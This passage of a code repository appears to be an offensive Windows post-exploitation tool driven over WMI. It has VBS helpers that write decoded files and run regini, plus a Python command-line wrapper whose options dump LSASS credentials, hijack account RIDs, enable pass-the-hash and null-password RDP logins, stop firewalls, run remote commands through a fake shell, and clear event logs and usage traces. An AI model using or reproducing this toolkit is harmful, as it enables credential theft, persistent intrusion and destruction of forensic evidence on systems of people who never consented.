oReg.SetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) -------------------------------------------------------------------------------- /vbs/regini.vbs: -------------------------------------------------------------------------------- 1 | set ws=wscript.createobject("wscript.shell") 2 | ret=ws.run ("C:\Windows\System32\regini.exe AAAAAAAAAAAAAAAAAAAAAA" ,3,true) 3 | -------------------------------------------------------------------------------- /vbs/writeFile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim xmldoc, node, bytes 23 | Set xmldoc = CreateObject("Msxml2.DOMDocument") 24 | Set node = xmldoc.CreateElement("binary") 25 | node.DataType = "bin.hex" 26 | node.Text = "AAAAAAAAAAAAAAAAAAAAAAAAA" 27 | bytes = node.NodeTypedValue 28 | FilePath = Base64Decode("BBBBBBBBBBBBBBBBBBBBBBB") 29 | Set objStream = CreateObject("ADODB.Stream") 30 | objStream.Type = 1 'Binary 31 | objStream.Open 32 | objStream.Write bytes 33 | objStream.SaveToFile FilePath, 2 'Overwrite 34 | objStream.Close -------------------------------------------------------------------------------- /wmi_query.py: -------------------------------------------------------------------------------- 1 | import module.userquery 2 | import module.getProcessList 3 | import module.rdpsetting 4 | import module.enable_pth_login_rdp 5 | import module.winrm_enable 6 | import module.FirewallRule_setting 7 | import module.Firewall_setting 8 | import module.vbsrun 9 | import module.cmdrun 10 | import module.cmdrun2 11 | import module.clearEventLog 12 | import module.dumpLsass 13 | import module.files 14 | import module.listdir 15 | import module.ridhijack 16 | import module.cleartrace 17 | import threading 18 | import logging 19 | import sys 20 | import re 21 | import time 22 | from io import StringIO 23 | import optparse 24 | import colorama 25 | 26 | 27 | def getProcessList(ip='', username='', password='',domain='',hashes='',aesKey='',query=False): 28 | module.getProcessList.getProcessList(ip, username, password,domain,hashes,aesKey,query) 29 | 30 | 31 | def userquery(ip='', username='', password='',domain='',hashes='',aesKey=''): 32 | module.userquery.userquery(ip, username, password,domain,hashes,aesKey) 33 | 34 | def enablerdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 35 | module.rdpsetting.enablerdp(ip, username, password,domain,hashes,aesKey,isenable) 36 | 37 | def enable_pth_login_rdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 38 | module.enable_pth_login_rdp.enable_pth_login_rdp(ip, username, password,domain,hashes,aesKey,isenable) 39 | 40 | def winrm_enable(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 41 | module.winrm_enable.winrm_enable(ip, username, password,domain,hashes,aesKey,isenable) 42 | 43 | def FirewallRule_setting(ip='', username='', password='',domain='',hashes='',aesKey='',arg=""): 44 | module.FirewallRule_setting.FirewallRule_setting(ip, username, password,domain,hashes,aesKey,arg) 45 | 46 | def Firewall_setting(ip='', username='', password='',domain='',hashes='',aesKey='',arg=""): 47 | module.Firewall_setting.Firewall_setting(ip, username, password,domain,hashes,aesKey,arg) 48 | 49 | def vbsrun(ip='', username='', password='',domain='',hashes='',aesKey='',vbsname=''): 50 | module.vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbsname) 51 | 52 | def stopvbs(ip='', username='', password='',domain='',hashes='',aesKey='',vbsid=''): 53 | if vbsid=="1" or vbsid=='': 54 | id="Example" 55 | else: 56 | id=vbsid 57 | module.vbsrun.delete(ip, username, password, domain, hashes, aesKey,id) 58 | 59 | def execute_command(ip='', username='', password='',domain='',hashes='',aesKey='',cmd=''): 60 | t=threading.Thread(target=module.cmdrun.exec_command,args=(ip, username, password, domain, hashes, aesKey,cmd)) 61 | t.setDaemon(True) 62 | t.start() 63 | t.join(300) #timeout 300s 64 | #module.cmdrun.exec_command(ip, username, password, domain, hashes, aesKey,cmd) 65 | 66 | def clear_eventlog(ip='', username='', password='',domain='',hashes='',aesKey='',logname='',id=''): 67 | module.clearEventLog.clear(ip, username, password, domain, hashes, aesKey,logname,id=id) 68 | 69 | def dump_lsass(ip='', username='', password='',domain='',hashes='',aesKey=''): 70 | module.dumpLsass.dump_lsass(ip, username, password, domain, hashes, aesKey) 71 | 72 | def cmdrun2(ip='', username='', password='',domain='',hashes='',aesKey='',cmd=''): 73 | module.cmdrun2.execcmd(ip, username, password, domain, hashes, aesKey,cmd) 74 | 75 | def fake_shell(ip='', username='', password='',domain='',hashes='',aesKey=''): 76 | import base64 77 | print("[*] connect IP:{} fakeshell".format(ip)) 78 | current_path="C:\\Windows\\System32" 79 | tmp_path="C:\\Windows\\System32" #命令结果报错时记录上一次成功命令的当前路径 80 | while True: 81 | user_cmd=input("{}>".format(current_path)) 82 | if user_cmd=="exit": 83 | break 84 | current=sys.stdout 85 | sys.stdout = StringIO() 86 | execute_result=module.cmdrun2.execcmd(ip, username, password, domain, hashes, aesKey, user_cmd,"fake_shell",current_path) 87 | sys.stdout = current 88 | # print(execute_result) 89 | cmdresult=execute_result.split("\n") 90 | 91 | #防止下标错误获取不到正确路径 92 | try: 93 | current_path=cmdresult[-3].rstrip("\r") 94 | if ":" and "\\" not in current_path: 95 | current_path=tmp_path 96 | else: 97 | tmp_path=current_path 98 | current_path=current_path 99 | except: 100 | current_path = current_path 101 | tmptxt=execute_result.find("[S]") 102 | print(execute_result[0:tmptxt]+"\r\n") 103 | 104 | def writeFile(ip='', username='', password='',domain='',hashes='',aesKey='',targetfile='',savetofile=''): 105 | module.files.WriteFile(ip, username, password, domain, hashes, aesKey,targetfile,savetofile) 106 | 107 | def readfile(ip='', username='', password='',domain='',hashes='',aesKey='',targetfile='',savetofile=''): 108 | module.files.readfile(ip, username, password, domain, hashes, aesKey,targetfile,savetofile) 109 | 110 | def lsdirpath(ip='', username='', password='',domain='',hashes='',aesKey='',targetpath=''): 111 | module.listdir.ls(ip, username, password, domain, hashes, aesKey,targetpath) 112 | 113 | def deletefile(ip='', username='', password='',domain='',hashes='',aesKey='',targetfile=''): 114 | module.files.deletefile(ip, username, password, domain, hashes, aesKey,targetfile) 115 | 116 | def rdpshadowset(ip='', username='', password='',domain='',hashes='',aesKey='',shadowid=0): 117 | module.rdpsetting.rdpshadow(ip, username, password, domain, hashes, aesKey,int(shadowid)) 118 | 119 | def rdpnulllogin(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 120 | module.rdpsetting.Login_with_empty_password(ip, username, password, domain, hashes, aesKey,int(isenable)) 121 | 122 | def user_rid_query(ip='', username='', password='',domain='',hashes='',aesKey=''): 123 | module.userquery.user_rid_query(ip, username, password, domain, hashes, aesKey) 124 | 125 | def ridhijack(ip='', username='', password='',domain='',hashes='',aesKey='',ridlist=""): 126 | module.ridhijack.run(ip, username, password, domain, hashes, aesKey,ridlist) 127 | 128 | def set_user(ip='', username='', password='',domain='',hashes='',aesKey='',ridlist=""): 129 | module.ridhijack.user_set(ip, username, password, domain, hashes, aesKey,ridlist) 130 | 131 | def clear_trace(ip='', username='', password='',domain='',hashes='',aesKey=''): 132 | module.cleartrace.cleartrace(ip, username, password, domain, hashes, aesKey) 133 | 134 | if __name__ == '__main__': 135 | parser=optparse.OptionParser() 136 | parser.add_option("-i",dest="ip",help="target IP") 137 | parser.add_option("-u",dest="username",help="auth username") 138 | parser.add_option("-d",dest="domain",help="target domain") 139 | parser.add_option("-p",dest="password",help="auth password") 140 | parser.add_option("-n",dest="ntlm",help="auth ntlm/lm") 141 | parser.add_option("-g",dest="get_process",action='store_true',help="get process list") 142 | parser.add_option("-q",dest="process_query",action='store_true',help="query Av/EDR/Process") 143 | parser.add_option("-U",dest="user_query",action='store_true',help="user list query") 144 | parser.add_option("-R",dest="enable_rdp",help="enable rdp/disable rdp") 145 | parser.add_option("-E",dest="enable_pth",help="enable rdp pth login") 146 | parser.add_option("-W",dest="enable_winrm",help="enable winrm service") 147 | parser.add_option("-F",dest="netfirewallrule",help="Query/Enable/Disable NetFirewallRule") 148 | parser.add_option("-f",dest="firewall",help="Start/Stop firewall") 149 | parser.add_option("-V",dest="vbs",help="Run vbs") 150 | parser.add_option("--stop_vbs",action="store",dest="stop_vbs",help="stop Default vbs Runing or Stop the id of vbs running") 151 | parser.add_option("--one_vbs_run",dest="one_vbs_run",help="vbs that only runs once") 152 | parser.add_option("--execute_command",dest="execute_command",help="execute command (NT 6.0)") 153 | parser.add_option("--execute_command2",dest="execute_command2",help="execute command") 154 | parser.add_option("--clear_eventlog",dest="clear_eventlog",help="clear event log") 155 | parser.add_option("--cycle_clear",action="store_true",dest="cycle_clear",help="cycle clear eventlog") 156 | parser.add_option("--shell",action="store_true",dest="exec2_fake_shell",help="fake shell") 157 | parser.add_option("--writefile",dest="writefile",help="write file") 158 | parser.add_option("--readfile",dest="readfile",help="read file") 159 | parser.add_option("--save-to-file",dest="outfile",help="write file save as path") 160 | parser.add_option("--ls",dest="lsdir",help="Query files and folders of a certain path") 161 | parser.add_option("--dele-file",dest="deletefile",help="remove file") 162 | parser.add_option("--rdp-shadow",dest="rdpshadow",help="rdp shadow setting (-1-Delete Shadow reg key,0-No remote control allowed,1-Full Control with User Rights,2-Full control without user permission,3-View sessions with user permissions,4-View conversations without user permission)") 163 | parser.add_option("--nulllogin",dest="nonelogin",help="Login with empty password") 164 | parser.add_option("--user-rid-query",action="store_true",dest="rid_query",help="Users RID Query") 165 | parser.add_option("--ridhijack",dest="rdihijack",help="RID hijack (--ridhijack ,)") 166 | parser.add_option("--set-user",dest="setuser",help="Enable/Disable User(--setuser ,1/0)") 167 | parser.add_option("--cleartrace",action="store_true",dest="cleartrace",help="Clear usage traces") 168 | (option,args)=parser.parse_args() 169 | ip = option.ip 170 | if option.domain != None: 171 | domain = option.domain 172 | else: 173 | domain = "" 174 | username = option.username 175 | password = option.password 176 | #原本想优化一下这一堆if的,咕咕咕 177 | if option.ip and option.username and (option.password!=None or option.ntlm !=None) and (option.get_process or (option.get_process and option.process_query)): 178 | getProcessList(ip=ip, domain=domain,username=username, password=password,hashes=option.ntlm,query=option.process_query) 179 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.user_query: 180 | userquery(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 181 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.enable_rdp: 182 | enablerdp(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_rdp) 183 | elif option.ip and option.username and (option.password!=None or option.ntlm !=None) and option.enable_pth: 184 | enable_pth_login_rdp(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_pth) 185 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.enable_winrm: 186 | winrm_enable(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,isenable=option.enable_winrm) 187 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.netfirewallrule: 188 | FirewallRule_setting(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,arg=option.netfirewallrule) 189 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.firewall: 190 | Firewall_setting(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,arg=option.firewall) 191 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.vbs: 192 | vbsrun(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,vbsname=option.vbs) 193 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.stop_vbs: 194 | stopvbs(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,vbsid=option.stop_vbs) 195 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.one_vbs_run: 196 | vbsrun(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,vbsname=option.one_vbs_run) 197 | time.sleep(2) 198 | stopvbs(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 199 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.execute_command: 200 | execute_command(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,cmd=option.execute_command) 201 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.clear_eventlog: 202 | clear_eventlog(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm, logname=option.clear_eventlog,id=option.cycle_clear) 203 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.execute_command2: 204 | cmdrun2(ip=ip, domain=domain, username=username, password=password, hashes=option.ntlm,cmd=option.execute_command2) 205 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.exec2_fake_shell: 206 | fake_shell(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 207 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.writefile and option.outfile: 208 | writeFile(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.writefile,savetofile=option.outfile) 209 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.readfile and option.outfile: 210 | readfile(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.readfile,savetofile=option.outfile) 211 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.lsdir: 212 | lsdirpath(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetpath=option.lsdir) 213 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.deletefile: 214 | deletefile(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,targetfile=option.deletefile) 215 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rdpshadow: 216 | rdpshadowset(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,shadowid=option.rdpshadow) 217 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.nonelogin: 218 | rdpnulllogin(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,isenable=option.nonelogin) 219 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rid_query: 220 | user_rid_query(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 221 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.rdihijack: 222 | ridhijack(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,ridlist=option.rdihijack) 223 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and option.setuser: 224 | set_user(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm,ridlist=option.setuser) 225 | elif option.ip and option.username and (option.password != None or option.ntlm != None) and clear_trace: 226 | clear_trace(ip=ip, domain=domain, username=username, password=password,hashes=option.ntlm) 227 | else: 228 | print("Usage:\npython wmi_query -i -u -p -g #Get Process List\n" 229 | "python wmi_query -i -u -p -g -q #query Av/EDR/Process\n" 230 | "python wmi_query -i -u -p -U #User Query\n" 231 | "python wmi_query -i -u -p -R 1 #Enable rdp\n" 232 | "python wmi_query -i -u -p -R 0 #Disable rdp\n" 233 | "python wmi_query -i -u -p -R 2 #Query rdp Port\n" 234 | "python wmi_query -i -u -p -E 1 #Enable PTH rdp\n" 235 | "python wmi_query -i -u -p -E 0 #Disable PTH rdp\n" 236 | "python wmi_query -i -u -p -W 1 #Enable winrm service\n" 237 | "python wmi_query -i -u -p -F query # query all Firewall rule\n" 238 | "python wmi_query -i -u -p -F query1 #query Enable Firewall rule\n" 239 | "python wmi_query -i -u -p -F query2 #query Disable Firewall rule\n" 240 | "python wmi_query -i -u -p -F querya #query inbound Firewall rule\n" 241 | "python wmi_query -i -u -p -F queryb #query outbound Firewall rule\n" 242 | "python wmi_query -i -u -p -F query1a #query Enable inbound Firewall rule\n" 243 | "python wmi_query -i -u -p -F query2a #query Disable inbound Firewall rule\n" 244 | "python wmi_query -i -u -p -F query1b #query Enable outbound Firewall rule\n" 245 | "python wmi_query -i -u -p -F query2b #query Disable outbound Firewall rule\n" 246 | "python wmi_query -i -u -p -F query3 #query InstanceID Firewall rule\n" 247 | "python wmi_query -i -u -p -F delete #delete InstanceID Firewall rule\n" 248 | "python wmi_query -i -u -p -F disable #Disable a firewall rule\n" 249 | "python wmi_query -i -u -p -F enable #Enable a firewall rule\n" 250 | "python wmi_query -i -u -p -f query #query Firewall\n" 251 | "python wmi_query -i -u -p -f stop #stop Firewall\n" 252 | "python wmi_query -i -u -p -F start #start Firewall\n" 253 | "python wmi_query -i -u -p -V #(vbs_id:Example) Run Vbs (The vbs is run repeatedly at intervals of 2 seconds, and the --stop_vbs parameter must be used to stop)\n" 254 | "python wmi_query -i -u -p --stop_vbs /--stop_vbs 1 #-- stop 1 stop default(vbsid:Example) vbs running on repeat/stop use --stop \n" 255 | "python wmi_query -i -u -p --one_vbs #vbs that only runs once\n" 256 | "python wmi_query -i -u -p --execute_command #To execute the command through Win32_ScheduledJob (NT 6.0), you need to wait for 1 minute\n" 257 | "python wmi_query -i -u -p --clear_eventlog #cear eventlog logName:appllication,system,setup,forwardedevents,security\n" 258 | "python wmi_query -i -u -p --clear_eventlog --cycle_clear# This will execute clear EventLog vbs forever(To stop use --stop )\n" 259 | "python wmi_query -i -u -p --execute_command2 #execute command\n" 260 | "python wmi_query -i -u -p --shell #Command execution mode 2 to get a fake shell\n" 261 | "python wmi_query -i -u -p --writefile --save-to-file # remote file writing\n" 262 | "python wmi_query -i -u -p --readfile --save-to-file # remote file reading\n" 263 | "python wmi_query -i -u -p --ls #Query files and folders of a certain path\n" 264 | "python wmi_query -i -u -p --rdp-shadow #Rdp Shadow Setting\n" 265 | "python wmi_query -i -u -p --nulllogin 0 #Enable null password login\n" 266 | "python wmi_query -i -u -p --nulllogin 0 #Disable null password login\n" 267 | "python wmi_query -i -u -p --user-rid-query #Users RID Query\n" 268 | "python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) #Rid Hijack Example\n" 269 | "python wmi_query -i -u -p --set-user ,0 #Disable User\n" 270 | "python wmi_query -i -u -p --set-user ,1 #Enable User\n" 271 | "python wmi_query -i -u -p --cleartrace #Clear usage traces,On cycle clearEventLog Security") 272 | parser.print_help() --------------------------------------------------------------------------------